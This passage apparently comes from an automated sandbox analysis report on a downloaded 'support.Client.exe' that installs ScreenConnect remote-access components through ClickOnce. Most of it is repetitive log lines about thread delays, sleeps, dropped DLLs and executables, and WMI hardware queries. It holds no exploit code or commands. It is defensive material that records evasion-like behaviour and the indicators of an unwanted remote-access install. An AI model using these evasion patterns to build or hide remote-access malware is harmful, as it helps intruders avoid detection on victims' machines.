              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMemory allocated: 1480000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMemory allocated: 30C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMemory allocated: 14E0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMemory allocated: 1790000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMemory allocated: 1F80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMemory allocated: 1DC0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeMemory allocated: 1670000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeMemory allocated: 1B040000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeMemory allocated: 1080000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeMemory allocated: 1AA70000 memory reserve | memory write watch
              Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599654Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599542Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599432Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599320Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599209Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599081Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598725Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598617Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598506Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598379Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598251Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598126Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597998Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597886Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597774Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597663Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597551Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597423Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597295Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597184Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597072Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596960Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596848Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596721Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596482Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596370Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596258Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596147Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596035Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595684Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595573Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595461Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595349Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595221Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595095Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594856Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594744Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594632Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594520Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594392Jump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 9688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Core.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Client.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsFileManager.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\ScreenConnect.Windows.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.Windows.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsFileManager.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\ScreenConnect.Core.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\ScreenConnect.ClientService.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\VPHPX4NN.BTC\4JXNCLAQ.OW1\ScreenConnect.ClientService.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\ScreenConnect.Client.dllJump to dropped file
              Source: C:\Windows\System32\svchost.exe TID: 6716Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exe TID: 7644Thread sleep time: -40000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -11068046444225724s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599874s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599654s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599542s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599432s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599320s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599209s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -599081s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598953s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598841s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598725s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598617s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598506s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598379s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598251s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -598126s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597998s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597886s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597774s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597663s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597551s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597423s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597295s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597184s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -597072s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596960s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596848s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596721s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596593s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596482s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596370s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596258s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596147s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -596035s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595907s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595796s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595684s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595573s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595461s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595349s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595221s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -595095s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594968s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594856s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594744s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594632s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594520s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7736Thread sleep time: -594392s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe TID: 1228Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe TID: 780Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe TID: 7376Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeThread delayed: delay time: 40000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599654Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599542Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599432Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599320Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599209Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599081Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598953Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598841Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598725Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598617Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598506Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598379Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598251Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598126Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597998Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597886Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597774Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597663Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597551Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597423Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597295Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597184Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597072Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596960Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596848Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596721Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596482Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596370Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596258Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596147Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596035Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595684Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595573Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595461Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595349Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595221Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595095Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594856Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594744Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594632Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594520Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594392Jump to behavior
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
